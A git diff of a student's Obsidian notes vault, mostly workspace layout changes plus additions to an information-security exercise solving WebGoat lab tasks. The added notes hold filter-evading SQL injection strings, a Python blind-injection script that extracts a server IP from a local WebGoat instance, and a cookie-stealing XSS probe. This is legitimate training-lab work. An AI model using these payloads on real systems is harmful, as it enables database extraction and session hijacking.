diff --git a/.obsidian/workspace.json b/.obsidian/workspace.json index 606f55c..64bd37b 100644 --- a/.obsidian/workspace.json +++ b/.obsidian/workspace.json @@ -1,15 +1,15 @@ { "main": { - "id": "1345ce316d57bf13", + "id": "985a28639027cb68", "type": "split", "children": [ { - "id": "08ad9b53ade42d31", + "id": "70d3e404042bb7e1", "type": "tabs", - "dimension": 62.59025270758123, + "dimension": 58.991008991009, "children": [ { - "id": "e2194e3299515374", + "id": "8d74a64b5bdd799c", "type": "leaf", "state": { "type": "markdown", @@ -23,12 +23,12 @@ ] }, { - "id": "47553fa673bb1eb6", + "id": "09960489beb8807f", "type": "tabs", - "dimension": 37.40974729241877, + "dimension": 41.008991008991, "children": [ { - "id": "20668ba691cd80b3", + "id": "9acdf2a1e42ed9ec", "type": "leaf", "state": { "type": "pdf", @@ -43,25 +43,15 @@ "direction": "vertical" }, "left": { - "id": "e5fbdfc2085faa4b", + "id": "cddcefee340fb8a5", "type": "split", "children": [ { - "id": "e02674fc64edf0b5", + "id": "94d495814220bf82", "type": "tabs", "children": [ { - "id": "b8336cb3c3d06be9", - "type": "leaf", - "state": { - "type": "file-explorer", - "state": { - "sortOrder": "alphabetical" - } - } - }, - { - "id": "14611a26bf336471", + "id": "70ca5d990fce7a86", "type": "leaf", "state": { "type": "search", @@ -76,29 +66,40 @@ } }, { - "id": "344d14435301d3da", + "id": "d5e695bcc8cab13d", "type": "leaf", "state": { "type": "starred", "state": {} } + }, + { + "id": "e66cc33cf17c042a", + "type": "leaf", + "state": { + "type": "file-explorer", + "state": { + "sortOrder": "alphabetical" + } + } } - ] + ], + "currentTab": 2 } ], "direction": "horizontal", - "width": 300 + "width": 200 }, "right": { - "id": "70ae06261ef3fc74", + "id": "4540e984d4c131f5", "type": "split", "children": [ { - "id": "07672eb406645795", + "id": "b1ae273364c01df7", "type": "tabs", "children": [ { - "id": "827e4aecb1891b44", + "id": "3c5c1738be747670", "type": "leaf", "state": { "type": "backlink", @@ -115,7 +116,7 @@ } }, { - "id": "583573a993e5af09", + "id": "a0e89b3fceee7653", "type": "leaf", "state": { "type": "outgoing-link", @@ -127,7 +128,7 @@ } }, { - "id": "fbf143571343fb20", + "id": "a8d05e2876a81d16", "type": "leaf", "state": { "type": "tag", @@ -138,7 +139,7 @@ } }, { - "id": "457947aad2c5e591", + "id": "858dd4c3359fda1d", "type": "leaf", "state": { "type": "outline", @@ -148,15 +149,7 @@ } }, { - "id": "631d374a04a792db", - "type": "leaf", - "state": { - "type": "advanced-tables-toolbar", - "state": {} - } - }, - { - "id": "b3aa4e2b20626da4", + "id": "4965238a34ee95eb", "type": "leaf", "state": { "type": "calendar", @@ -164,7 +157,7 @@ } }, { - "id": "c3c39c68e6060e3e", + "id": "838787be957ae435", "type": "leaf", "state": { "type": "juggl_nodes", @@ -172,15 +165,14 @@ } }, { - "id": "ccdfcdb588345764", + "id": "974f4434812d0416", "type": "leaf", "state": { "type": "juggl_style", "state": {} } } - ], - "currentTab": 4 + ] } ], "direction": "horizontal", @@ -196,52 +188,48 @@ "templates:Insert template": false, "command-palette:Open command palette": false, "table-editor-obsidian:Advanced Tables Toolbar": false, - "obsidian-livesync:Replicate": false, - "obsidian-livesync:Show log": false, "obsidian-advanced-slides:Show Slide Preview": false, - "juggl:Juggl global graph": false + "juggl:Juggl global graph": false, + "obsidian-livesync:Replicate": false, + "obsidian-livesync:Show log": false } }, - "active": "e2194e3299515374", + "active": "8d74a64b5bdd799c", "lastOpenFiles": [ + "Informationssicherheit/Ueb2/2023-04-17_14-16.png", "Informationssicherheit/Ueb2/02-ueb_uebungsblatt.pdf", "Informationssicherheit/Ueb2/Ueb2.md", - "Informationssicherheit/Ueb2/2023-04-17_14-16.png", - "Untitled 1.md", - "Untitled.md", - "Excalidraw/Drawing 2023-04-17 08.21.36.excalidraw.md", - "Excalidraw/Drawing 2023-04-17 08.21.00.excalidraw.md", - "Excalidraw", - "FH/Informationssicherheit/Ueb2/Ueb2.md", "README.md", - "FH/Informationssicherheit/Ueb2/test.md", - "Informationssicherheit/Ueb2/test2.md", - "Informationssicherheit/Ueb2/Untitled.md", - "Informationssicherheit/Ueb1/01-ueb_uebungsblatt.pdf", - "Informationssicherheit/Ueb1/20230330_19h30m31s_grim.png", - "Informationssicherheit/Ueb1/20230330_19h34m13s_grim.png", - "Informationssicherheit/Ueb1/20230331_07h21m13s_grim.png", - "Informationssicherheit/Ueb1/20230331_10h28m24s_grim.png", - "Informationssicherheit/Ueb1/20230331_10h28m43s_grim.png", - "Informationssicherheit/Ueb1/20230331_14h12m43s_grim.png", - "Informationssicherheit/Ueb1/20230331_16h17m48s_grim.png", - "Informationssicherheit/Ueb1/20230331_16h21m51s_grim.png", - "Informationssicherheit/Ueb1/20230331_16h22m19s_grim.png", - "Informationssicherheit/Ueb1/Ueb01.md", - "Informationssicherheit/Ueb1/Ueb01.pdf", "Informationssicherheit/VL/01-orga-motivation-handout.pdf", - "Informationssicherheit/VL/02-terminologie-handout.pdf", - "Informationssicherheit/VL/03-fm-orga-handout.pdf", - "CCN/VL01.md", - "Algorithmen und Datenstrukturen/UEB01.md", "2023-04-16.md", - "Informationssicherheit/Ueb1", - "Informationssicherheit/VL", - "CCN", - "FH/2023-04-16.md", - "FH/Informationssicherheit/Ueb1/Ueb01.md", - "FH/Informationssicherheit/Ueb01.md", + "Informationssicherheit/Ueb2/test2.md", + "FH/Informationssicherheit/Ueb2/test.md", + "FH/Informationssicherheit/Ueb2/Untitled.md", + "FH/Informationssicherheit/Ueb1/20230330_19h30m31s_grim.png", + "FH/Informationssicherheit/Ueb1/20230330_19h34m13s_grim.png", "FH/Algorithmen und Datenstrukturen/UEB01.md", - "FH/CCN/VL01.md" + "FH/Algorithmen und Datenstrukturen", + "FH/Informationssicherheit/Ueb1/20230331_07h21m13s_grim.png", + "FH/Informationssicherheit/Ueb1/20230331_10h28m24s_grim.png", + "FH/Informationssicherheit/Ueb1/20230331_10h28m43s_grim.png", + "FH/Informationssicherheit/Ueb1/20230331_14h12m43s_grim.png", + "FH/Informationssicherheit/Ueb1/20230331_16h17m48s_grim.png", + "FH/Informationssicherheit/Ueb1/20230331_16h21m51s_grim.png", + "FH/Informationssicherheit/Ueb1/20230331_16h22m19s_grim.png", + "FH/Informationssicherheit/Ueb1/20230331_16h29m50s_grim.png", + "FH/Informationssicherheit/Ueb1/Ueb01.pdf", + "FH/CCN/VL01.md", + "FH/CCN", + "FH/Informationssicherheit/Ueb1/Ueb01.md", + "FH/Informationssicherheit/VL/01-orga-motivation-handout.pdf", + "FH/Informationssicherheit/VL/02-terminologie-handout.pdf", + "FH/Informationssicherheit/Ueb1/01-ueb_uebungsblatt.pdf", + "FH/Informationssicherheit/Ueb2/02-ueb_uebungsblatt.pdf", + "FH/Informationssicherheit/VL/03-fm-orga-handout.pdf", + "FH/2023-04-16.md", + "FH/Informationssicherheit/Ueb2/Ueb2.md", + "Informationssicherheit/Ueb1/Ueb01.md", + "Algorithmen und Datenstrukturen/UEB01.md", + "CCN/VL01.md" ] } \ No newline at end of file diff --git a/Informationssicherheit/Ueb2/Ueb2.md b/Informationssicherheit/Ueb2/Ueb2.md index b5cbfac..3ab57c7 100644 --- a/Informationssicherheit/Ueb2/Ueb2.md +++ b/Informationssicherheit/Ueb2/Ueb2.md @@ -219,3 +219,59 @@ a';/**/select/**/*/**/from/**/user_system_data;-- ``` ### 4 +``` +a';/**/seselectlect/**/*/**/frfromom/**/user_system_data;-- +``` + +### 5 +```python +import json +import requests + +def sql_injection_mitigation_10(): + index = 0 + + headers = { + 'Cookie': 'JSESSIONID=8f8OmDA8QEB8JwmEJtPbWkvVtAM_2AerEHJoWYFT' + } + + while True: + payload = '(CASE WHEN (SELECT ip FROM servers WHERE hostname=\'webgoat-prd\') LIKE \'{}.%\' THEN id ELSE hostname END)'.format(index) + + r = requests.get('http://127.0.0.1:8080/WebGoat/SqlInjectionMitigations/servers?column=' + payload, headers=headers) + + try: + response = json.loads(r.text) + except: + print("Wrong JSESSIONID, find it by looking at your requests once logged in.") + return + + if response[0]['id'] == '1': + print('webgoat-prd IP: {}.130.219.202'.format(index)) + return + else: + index += 1 + if index > 255: + print("No IP found") + return + +sql_injection_mitigation_10() +``` +Output: +``` +webgoat-prd IP: 104.130.219.202 +``` + +## Aufgaben +### a + + +# 2.3 + +## Cross Site Scripting + +### 1 +alert(document.cookie) +- JSESSIONID=WAoLCuHqYVKBPATEYnT23tGJaJPRHR9xRbDfnd2C + +### 2